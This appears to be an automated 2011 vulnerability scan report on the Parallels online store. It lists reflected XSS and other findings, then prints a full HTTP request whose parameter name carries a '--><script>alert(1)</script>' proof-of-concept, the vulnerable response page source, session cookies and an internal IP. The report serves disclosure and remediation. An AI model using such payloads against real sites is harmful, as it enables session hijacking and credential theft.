XSS, Cross Site Scripting, store.aparallels.com, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Fri Mar 11 15:39:37 CST 2011.

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Loading

1. Cross-site scripting (reflected)

1.1. http://store.parallels.com/store [name of an arbitrarily supplied request parameter]

1.2. https://store.parallels.com/store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage [name of an arbitrarily supplied request parameter]

2. Cookie without HttpOnly flag set

3. Cross-domain Referer leakage

3.1. http://store.parallels.com/store

3.2. http://store.parallels.com/store

4. Cross-domain script include

4.1. http://store.parallels.com/store

4.2. https://store.parallels.com/store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage

5. Email addresses disclosed

5.1. http://store.parallels.com/store

5.2. https://store.parallels.com/store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage

6. Private IP addresses disclosed

7. Cacheable HTTPS response

8. Content type incorrectly stated

8.1. http://store.parallels.com/DRHM/Storefront/Site/para/cm/images/favicon.ico

8.2. http://store.parallels.com/store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage

8.3. https://store.parallels.com/DRHM/Storefront/Site/para/cm/images/favicon.ico


1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://store.parallels.com/store [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.parallels.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4cff6--><script>alert(1)</script>2ce5d8d75e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)</script>2ce5d8d75e9=1 HTTP/1.1
Host: store.parallels.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/small-business-panel/windows/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=ed047e3c47a758dd56638158d4729675; __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.1.10.1299874733; s_cc=true; s_gpv_page=ParallelsSmallBusinessPanelforWindowsEN; s_vnum=1331410733871%26vn%3D1; s_invisit=true; s_nr=1299874733877-New; s_sq=%5B%5BB%5D%5D; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=111300990546,0)
Date: Fri, 11 Mar 2011 20:18:29 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Content-Length: 41919




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=meta.html"-->
<link rel="icon" href="/DRHM/Storefront/Site/para/cm/images/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/commonFunctions.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/mbox.js"></script>
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?4cff6--><script>alert(1)</script>2ce5d8d75e9=1&Action=DisplayESIPage&Currency=USD&ESIHC=d445603d&Env=BASE&Locale=en_US&SiteID=para&StyleID=26770400&StyleVersion=58&ceid=170596700&cename=TopHeader&id=ThreePgCheckoutShoppingCartPage"-->






<!-- REQUEST ID: TIME=1299874709826:NODE=c1a6104:THREAD=111; ESI Fragment - CREATED: Fri Mar 11 14:18:29 CST 2011 MAX-AGE: 28800+180 -->
<!-- BEGIN TOPHEADER -->
<!-- -->

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Parallels, Inc. (para) Online Store - Shopping Cart</title>
<!-- Accessibility links for Home, Help, and Contents (Sitemap) -->
<link rel="home" href="/store/para/en_US/home" title="Home"/>
<link rel="help" href="/store/para/en_US/help" title="Help"/>
<link rel="contents" href="/store/para/en_US/sitemap" title="Sitemap"/>














<script type="text/javascript">
var q = true; // Page-level global variable

// Temporary popUp function that will be replaced by the overlay-enhanced version when the DOM is fully loaded
function popUp(popURL, popName, popWidth, popHeight) {
self.open(popURL, popName, 'width='+popWidth+',height='+popHeight+',resizable=yes,status=yes,screenX=50,screenY=50,top=50,left=50,scrollbars=yes');
}
</script>






<script type="text/javascript">



if (!window.jQuery) {
document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');
}

</script>









<script type="text/javascript">
var pageNameFlag = '';
</script>


<!-- Global OT: ptomodule object and browser-detection/cookie-setting -->
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/OTGlobalCode.js"></script>
<script type="text/javascript">
var ot_Country = 'en_US';
</script>
<!-- Site-level OT, from PageBuilder page: OT_globalTrial -->
<script type="text/javascript" src="//atl.img.digitalriver.com/drso/drso-1.4.min.js"></script>
<script type="text/javascript">
if (typeof(optrial) !== 'object') {
optrial = {};
}
//set the cross-domain cookie for NCT Trial Reg test, and delete the download page session cookie (so the sale wil count toward NCT, not download page tests
if (drso.getSessionVar('op612nctfulfill0285001liid').length > 0){
drso.setCookie('op612nctfulfill0285001liid', drso.getSessionVar('op612nctfulfill0285001liid'), drso.getDomain(), null);
drso.deleteCookie('op612downloadparallelsdesktop5formaceliid');
}
</script>
<!-- End of OT_globalTrial -->

<!-- Page-level OT, from OT_ThreePgCheckoutShoppingCartPage_contentBody -->
<script>
optrial.pageName = 'ThreePgCheckoutShoppingCartPage';

// Portfolio: GC-para
// Subject: ThreePgCheckoutShoppingCartPage
(function(){var _o=ptomodule;_o.U="https://ssl.pto.digitalriver.com/by/trial/612/p/threepgcheckoutshoppingcartpage./15/content.js";
_o.ST="script";_o.SA={"type":"text/javascript"};_o.B();_o.R(1000,null,null,null);})();
</script>
<!-- End of OT_ThreePgCheckoutShoppingCartPage_contentBody -->


</head>
<body>


<span class="opDefault" id="opmodule_para_bodyTop"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyTop');
</script>



<!-- END TOPHEADER -->

<!--!/esi:include --><!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section0.html"-->
<!--[if IE]
<style type="text/css">
#dr_productUpSell form div#dr_siteButtons {
margin-top:130px;
}
table#us_buttons {
margin:0px 0px 0px 225px;    
}    
</style>
-->

<table border="0" cellpadding="0" cellspacing="0" width="805" align="center">

<tr>
<td class="logo" width="667px"><h1><a href="//www.parallels.com/" title="Parallels"></a></h1></td>
<td id="secureInfo" width="138px"><!--SECURE-LOGO-->

<!--!/esi:include -->






<!-- REQUEST ID: TIME=1299874709735:NODE=c1a6104:THREAD=111 -->








<div id="dr_geoTrustIcon">
<!-- GeoTrust[tm] Smart Icon tag. Do not edit. -->
<script language="javascript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
<!-- end GeoTrust Smart Icon tag -->
</div>

<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section1.html"-->
       
<!--/SECURE-LOGO-->
</td>

</tr>
<tr>
<td class="breadCrumbsRed" colspan="2"><img src="/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_on.jpg" alt="Step 1 Cart" width="200" height="22" id="stepOne" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg" alt="Step 2 Billing" width="200" height="22" id="stepTwo" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg" alt="Step 3 Verify" width="200" height="22" id="stepThree" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_off.jpg" alt="Step 4 Complete" width="200" height="22" id="stepFour" /></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" class="main" align="center">
<tr>
<td><div id="content">
<!--!/esi:include -->




<span class="opDefaultContent" id="opmodule_para_ThreePgCheckoutShoppingCartPage_contentBody">























<!-- Splash Transformer Optimized -->










<!--..Layout: ThreePgCheckoutShoppingCartPage, Generated: Tue Mar 08 16:04:09 CST 2011..-->
<div xmlns="http://www.w3.org/1999/xhtml">
<div xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" class="dr_Content" id="dr_ThreePgCheckoutShoppingCart">
<h1>Shopping Cart</h1>
<div id="dr_currencySelector">
<form method="get" action="/store/">
<input name="Action" type="hidden" value="DisplayThreePgCheckoutShoppingCartPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutShoppingCartPage"/>
<p>
<strong>Select Currency:</strong>
<select name="currency" onChange="q=false;this.form.submit();">
<option selected="selected">USD</option>
<option>AED</option>
<option>ARS</option>
<option>AUD</option>
<option>BGN</option>
<option>BRL</option>
<option>CAD</option>
<option>CHF</option>
<option>CLP</option>
<option>CNY</option>
<option>CZK</option>
<option>DKK</option>
<option>EEK</option>
<option>EGP</option>
<option>EUR</option>
<option>GBP</option>
<option>HKD</option>
<option>HRK</option>
<option>IDR</option>
<option>ILS</option>
<option>INR</option>
<option>ISK</option>
<option>JPY</option>
<option>KRW</option>
<option>LTL</option>
<option>LVL</option>
<option>MXN</option>
<option>MYR</option>
<option>NOK</option>
<option>NZD</option>
<option>PLN</option>
<option>RUB</option>
<option>SAR</option>
<option>SEK</option>
<option>SGD</option>
<option>THB</option>
<option>TRY</option>
<option>TWD</option>
<option>UAH</option>
<option>ZAR</option>
</select>
<noscript>
<input type="submit" class="dr_button" value="update"/>
</noscript>
</p>
</form>
</div>
<form method="post" action="/store/">
<input name="Action" type="hidden" value="DisplayThreePgCheckoutShoppingCartPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input value="com.digitalriver.template.form.ShoppingCartForm" name="Form" type="hidden"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutShoppingCartPage"/>
<div id="dr_orderNumber">
<p>
<strong>Reference Number:</strong>..7154200626</p>
</div>
<div id="dr_shoppingCartTable">
<table id="dr_cartTbl" summary="This table contains your Shopping Cart information">
<thead>
<tr>
<th scope="col" class="dr_productName">Product Name</th>
<th class="dr_qty" scope="col">Qty</th>
<th class="dr_deliveryMethod" scope="col">Delivery</th>
<th class="dr_price">Price</th>
<th class="dr_remove" scope="col">remove</th>
</tr>
</thead>
<tbody>
<tr class="dr_oddRow">
<td scope="row" class="dr_productName">
<a target="_blank" href="/store/para/en_US/DisplayPage/id.ProductInterstitialDetailsPage/productID.222100500" onclick="popUp(this.href,'productDetail',450,400);return false;" lineItemID="5217905926">Parallels Small Business Panel for Windows - 1 User</a>
</td>
<td class="dr_qty">
<input type="hidden" name="ORIG_VALUE_lineItemID$$1001" value="5217905926"/>
<input name="lineItemID$$1001" value="5217905926" type="hidden"/>
<span class="dr_error">
<!--..-->
</span>
<input type="hidden" name="ORIG_VALUE_quantity$$1001" value="5"/>
<input name="quantity$$1001" value="5" size="2" class="dr_qtyInput" type="text"/>
<input type="image" class="dr_refreshQtyImage" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_update.gif" alt="update" title="update"/>
</td>
<td class="dr_deliveryMethod" scope="row"/>
<td scope="row" class="dr_price">$200.00</td>
<td class="dr_remove" scope="row">
<a class="dr_deleteItemLink" href="/store/para/en_US/RemoveItemFromRequisition/lineItemID.5217905926/nextAction.DisplayThreePgCheckoutShoppingCartPage" title="remove" rel="nofollow">
<img class="dr_deleteItemImage" border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/removex2new.gif" alt="remove"/>
</a>
</td>
</tr>
<tr>
<td colspan="5" class="dr_backUpCD">
<div class="bucket-noheader-container">
<div class="bucket-top">
<span/>
</div>
<div class="bucket-borders">
<div class="bucket-noheader-content">
<div class="candy">
<h2 class="hdr-alpha">
<span id="dr_candyRackHeader" class="dr_subHeader">
<em>
                                                           We also recommend:
                                                       </em>
</span>
</h2>
</div>
</div>
</div>
<div class="bucket-btm">
<span>..</span>
</div>
</div>
</td>
</tr>
<tr>
<td colspan="3" class="dr_couponCode">
<label for="promoCode">Promo Code:</label>
<input type="hidden" name="ORIG_VALUE_popName" value="PointOfSale_CouponEntryField"/>
<input name="popName" value="PointOfSale_CouponEntryField" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_couponCode" value=""/>
<input name="couponCode" value="" type="text" size="10" id="promoCode"/>
<input type="image" class="dr_button" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_apply.gif"/>
</td>
<td colspan="2" class="dr_updateBtn"/>
</tr>
<tr id="dr_cartTotals">
<td colspan="3"/>
<td id="dr_totals" colspan="2">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr id="dr_priceTotal">
<td class="dr_price dr_totals">Total: $200.00</td>
</tr>
</table>
</td>
</tr>
</tbody>
</table>
</div>
<input type="image" class="dr_refreshQtyImage" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_update.gif" alt="update" title="update"/>
<div id="dr_siteButtons">
<div id="dr_continueShoppingButton">
<a class="dr_button" href="/store/para/en_US/ContinueShopping">
<img border="0" alt="continue shopping" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_continueShopping.gif"/>
</a>
</div>
<div id="dr_checkoutButton">
<a class="dr_button" href="https://store.parallels.com/store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage">
<img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_checkout.gif" alt="checkout"/>
</a>
</div>
</div>
<div id="creditCardLogos">
<img alt="Accept Credit Cards" src="/DRHM/Storefront/Site/para/cm/images/payment-methods2.gif"/>
</div>
<p id="dr_cartPricingDisclaimer" class="dr_clearBoth">Prices and offers in the cart are subject to change until the order is submitted.</p>
<div id="dr_TCFooter"><div id="dr_overlay_wrapper" style="position:absolute;width:687px;height:383px;display:none;"><table border="0" cellspacing="0" cellpadding="0" id="dr_overlay_table"><tr><td class="dr_overlay_table_top_left">&nbsp;</td><td class="dr_overlay_table_top_middle">&nbsp;</td><td class="dr_overlay_table_top_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_left">&nbsp;</td><td class="dr_overlay_table_middle"><div id="dr_overlay_header"><div id="dr_overlay_close_window"><a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a></div><div id="dr_overlay_logo"><a href="/store/defaults/en_US&id=DRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a></div><div class="dr_overlay_clearit"><!-- --></div><div id="dr_overlay_nav"><ul id="dr_overlay_tabs"><li class="dr_overlay_about_digital_river"><a id="ContactInformationLink" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe">About Digital River, Inc.</a></li><li class="dr_overlay_privacy_policy"><a id="PrivacyPolicyLink" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage" target="DrOverlayIframe">Privacy Policy</a></li><li class="dr_overlay_terms_and_conditions"><a id="TermsAndConditionsLink" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage" target="DrOverlayIframe">Terms of Sale</a></li><li class="dr_overlay_print"><a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/icon_printer.gif" alt="Print"/></a></li></ul><!-- /#dr_overlay_tabs --></div><div class="dr_overlay_clearit"><!-- --></div></div><!-- /#dr_overlay_header --><iframe name="DrOverlayIframe" src="javascript:false" width="665" height="300" scrolling="auto" frameborder="0" marginheight="0" marginwidth="0"></iframe></td><td class="dr_overlay_table_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_bottom_left">&nbsp;</td><td class="dr_overlay_table_bottom_middle">&nbsp;</td><td class="dr_overlay_table_bottom_right">&nbsp;</td></tr></table></div><!-- /#dr_overlay_wrapper --><script type="text/javascript">if (!window.jQuery) {document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');}</script><script type="text/javascript">(function($){$(window).load(function(){if ($.boxModel || ($.support && $.support.boxModel)) {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.base.css" type="text/css"/>');var msie = navigator.userAgent.match(/MSIE (\d+)/);var ie6 = false;var dataOK = true;if (msie) {var ver = parseInt(msie[1]);if (ver < 8) {dataOK = false;if (ver < 7) {ie6 = true;$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE6.css" type="text/css"/>');}else {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE7.css" type="text/css"/>');}}}else if (/Firefox\/3\.5/.test(navigator.userAgent)) {dataOK = false;}if (dataOK) {$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.data.css" type="text/css"/>');}var overlaySetup = function(){var footerLinkSelector = 'a.dr_aboutDigitalRiver,a.dr_privacyPolicy,a.dr_termsAndConditions';$(footerLinkSelector).removeAttr('onclick');$('#dr_overlay_wrapper').overlay({fixed: !ie6,modal: {css: {backgroundColor: '#FFF'}},showSelector: footerLinkSelector,hideSelector: '#dr_overlay_close_window > a[href="#"]',onShow: function(bgOverlay, footerLink){var iframeOverlay = this;$(bgOverlay).fadeIn('normal', function(){if (ie6) {self.scrollTo(0, 0);}$(iframeOverlay).slideDown('slow');});$('iframe', this).one('load', function(){$(this).css('visibility', 'visible');});parent.frames[footerLink.target].location.replace(footerLink.href);return false;},onHide: function(bgOverlay){$(this).hide();$(bgOverlay).fadeOut('normal');return false;}}).find('li.dr_overlay_print > a[href="#"]').click(function(){if (window['DrOverlayIframe']) {window['DrOverlayIframe'].focus();window['DrOverlayIframe'].print();}}).end().find('#dr_overlay_logo > a,li.dr_overlay_about_digital_river > a,li.dr_overlay_privacy_policy > a,li.dr_overlay_terms_and_conditions > a').click(function(){parent.frames[this.target].location.replace(this.href);return false;});};if ($.fn.overlay) {overlaySetup();}else {$.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay-1.1.min.js',dataType: 'script',cache: true,global: false,success: overlaySetup});}}});})(jQuery);</script><p><a class="dr_aboutDigitalRiver" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'aboutDigitalRiver',400,400);return false;" target="DrOverlayIframe">Digital River Inc.</a> is the authorized reseller and merchant of the products and services offered within this store.</p><p><a class="dr_privacyPolicy" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'privacyPolicy',660,400);return false;" target="DrOverlayIframe">Privacy Policy</a>&nbsp;&nbsp;&nbsp;<a class="dr_termsAndConditions" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'termsAndConditions',630,400);return false;" target="DrOverlayIframe">Terms of Sale</a>&nbsp;&nbsp;&nbsp;</p></div>
</form>
</div>
</div>




<script type="text/javascript">
// Called via onchange from shipping dropdown
function changeEstimatedShipping(zoneList, optionList, shippingForm) {
if (zoneList.selectedIndex !== 0) {
shippingForm.shippingOptionID.value = optionList.options[optionList.selectedIndex].value;
shippingForm.country.value = zoneList.options[zoneList.selectedIndex].value;
q = false;
shippingForm.submit();
}
}
// fireclick
var fc_track = "shopping_cart";





/* View */
               var fc_prod_view = "";





</script>


</span><!-- /.opDefaultContent -->
<script type="text/javascript">
ptomodule.displayModule('para_ThreePgCheckoutShoppingCartPage_contentBody');
</script>
















<!-- popUp overlay tags -->
<div class="popup_window_wrapper" style="display:none;position:absolute;">
<div class="popup_window_title_bar_wrapper">
<div class="popup_shadow9"></div>
<div class="popup_title_bar">
<h1 class="popup_title_header"></h1>
<div class="popup_close_button_wrapper">
<div class="popup_button_cover"><a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" alt="Close Window" border="0"/></a></div>
<div class="popup_title_fade"></div><div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_close_button_wrapper -->
</div><!-- /.popup_title_bar -->
<div class="popup_shadow1"></div>
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_window_title_bar_wrapper -->
<div class="popup_middle_wrapper">
<div class="popup_left_shadow_wrapper"><div class="popup_shadow8"></div><div class="popup_shadow7"></div></div><!-- /.popup_left_shadow_wrapper -->
<div class="popup_content_wrapper"><iframe class="popup_content_iframe" src="javascript:false;" scrolling="auto" frameborder="0">Loading...</iframe></div>
<div class="popup_right_shadow_wrapper"><div class="popup_shadow2"></div><div class="popup_shadow3"></div></div><!-- /.popup_right_shadow_wrapper -->
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_middle_wrapper -->
<div class="popup_bottom_bar_wrapper"><div class="popup_shadow6"></div><div class="popup_shadow5"></div><div class="popup_shadow4"></div><div class="popup_clear_it"><!-- --></div></div><!-- /.popup_bottom_bar_wrapper -->
</div><!-- /.popup_window_wrapper -->










<script type="text/javascript">
//if (pageNameFlag=='confirmOrderPage') {
//$('#dr_shipMethod').change(onShippingMethodChange);
//}

if (pageNameFlag=='quickBuyCartPage') {
$("#shippingDifferentThanBilling").click( function(){
$("#dr_shippingContainer").toggle();
});
}
</script>



<script type="text/javascript">
// Function to hide/show info
function hideText(id) {
jQuery('#'+id).toggle();
}
// Function to disable submit button after it has been clicked once already to prevent multiple order submission on CheckoutPayment and ConfirmOrder
function disableButton(button) {
//jQuery(button).hide();
}
// Pull in the overlay verison of popUp on DOM-ready, which will overwrite the old-school function above
if (top === self) { // Don't pull in this code if we're already in a pop-up (iframe)
jQuery(function(){


// Pull in the main CSS for the popUp overlay
       
jQuery.get('/store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage', function(popUpStyle){
jQuery('head').append(popUpStyle);
}, 'html');

// Include browser-specific components
var dataOK = true;
var msie = navigator.userAgent.match(/MSIE (\d+)/);
if (msie) {
var ieVer = parseInt(msie[1]);
if (ieVer < 8) {
dataOK = false;
if ((ieVer < 7) && !jQuery.fn.overlay) { // Include the overlay plugin for IE6
jQuery.ajax({url: '//drh2.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay.min.js', dataType: 'script', cache: true, global: false});
}
}
}
else if (/Firefox\/3\.5/.test(navigator.userAgent)) {
dataOK = false; // FF 3.5 bug #477118
}
// Pull in the draggable popUp overlay script
jQuery.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.draggable.popUp.min.js', dataType: 'script', cache: true, global: false});
// Use embedded data: images for the shadows, if the browser can handle it
if (dataOK) {
jQuery('head').append('<link rel="stylesheet" type="text/css" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/PopUp.Shadows.data.css"/>');
}
});
}
</script>



































<script type="text/javascript">
// Show the links that will allow the details to be expanded
jQuery(function(){
jQuery('#shippingDifferentThanBillingIndicator,span.dr_expandDetails').show().find('[data-expand-section]').click(function(){
jQuery('#'+jQuery(this).attr('data-expand-section')).toggle();
return !(this.href);
}).click();
});
$('#dr_ExtendedDownloadServiceOffer .dr_button, #dr_BackUpCDOffer .dr_button').click( function() {
$(this).css('visibility','hidden');
});
</script>








<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section2.html"-->
</div></td>
</tr>
<tr>
<td id="copyright"><div class="left">&copy; 1999-2011 Parallels, Inc. All rights reserved.</div><div class="right"></div></td>
</tr>
</table>
<script type="text/javascript">
   var errorMssgs = [];
   $('.dr_error').each(function(i) {
       errorMssgs[i] = $(this).html();
   });
   for (i=0;i<errorMssgs.length;i++) {
       if (errorMssgs[i].indexOf('Enter a valid value') > -1) {
        $('#dr_ThreePgCheckoutAddressPaymentInfo p.dr_requiredFieldsInfo').before('<p id="topError" style="color:red; font-size:12px; font-weight:bold;">Sorry, we have encountered an error. Please check that you have filled in everything correctly below.</p>');
           break;
       }
   }
</script>

<script type="text/javascript">
fc_track = (typeof(fc_track) === 'undefined') ? null : fc_track;
$(function () {
   function op_ChangeBreadcrumbs(argCurrentStep) {
if (argCurrentStep === 'billing') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_on.jpg");
} else if (argCurrentStep === 'review') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_on.jpg");
} else if (argCurrentStep === 'thank_you') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg");
$("#stepFour").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_on.jpg");
}
   }
op_ChangeBreadcrumbs(fc_track);
});
</script>

<script>
// Added by J D April 2010 to customize site
//Updated by J J 5/27/2010 - 8/2010
// Floating security Cert to the right
$('div#dr_geoTrustIcon').css('float','right');
$('div#dr_geoTrustIcon a').css('float','right').css('text-align','right'); //for IE
$('div#dr_geoTrustIcon a img').css('float','right').css('text-align','right'); //for IE

